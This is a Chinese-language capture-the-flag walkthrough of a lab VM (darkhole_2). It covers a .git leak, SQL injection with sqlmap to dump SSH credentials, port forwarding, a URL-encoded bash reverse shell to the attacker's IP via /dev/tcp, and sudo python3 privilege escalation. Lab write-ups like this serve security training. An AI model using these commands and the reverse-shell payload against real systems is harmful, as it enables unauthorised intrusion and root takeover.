kali:192.168.223.128

靶机:192.168.223.152

主机发现

nmap -sP 192.168.223.0/24

端口扫描

nmap -sV -p- -A 192.168.223.152

开启了22 80 端口

web

进入登录界面发现没有注册按钮了

扫一下目录

 gobuster dir -u http://192.168.223.152 -x html,txt,php,bak,zip,git --wordlist=/usr/share/wordlists/dirb/common.txt  

好像就.git文件比较可靠

用git_dumper.py 重构源码

git-dumper http://192.168.223.152/.git backup
git log

git diff a4d900a8d85e8938d3601f3cef113ee293028e10

查找第二次提交不同的时候有邮箱密码

邮箱:lush@admin.com

密码:321

测试发现url中id=1可以sql注入

 python sqlmap.py http://192.168.223.152/dashboard.php?id=1 --cookie="PHPSESSID=283nc54ubju86rl6it21i0m24g" --batch -D darkhole_2 -T ssh --dump

可以跑出ssh密码

在losy目录下找到第一个flag

继续乱翻

看到opt下有个web目录

这个url可以执行命令，在80端口测试发现不可以使用，说明不是80端口的

在定时任务里面看到这是开在9999端口的服务，定时任务由losy权限执行

将9999端口转发到本地

ssh -L 9999:127.0.0.1:9999 jehad@192.168.1.105

确实可以rce，那么反弹shell应该就能拿到losy的shell

cmd=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.223.128%2F4567%20%200%3E%261'

看历史指令

有个密码是gang

用这个密码发现ssh可以连接losy

可以看到python由root权限

那么直接用/usr/bin/python3开启一个shell那么就能拿到root权限

sudo /usr/bin/python3 -c 'import os;os.system("/bin/bash")'

最后拿到flag

总结：

1.git泄露，git-dumper获取源代码

2.sql注入拿到ssh账号密码

3.端口转发到本地

4.历史指令泄露

5.python提权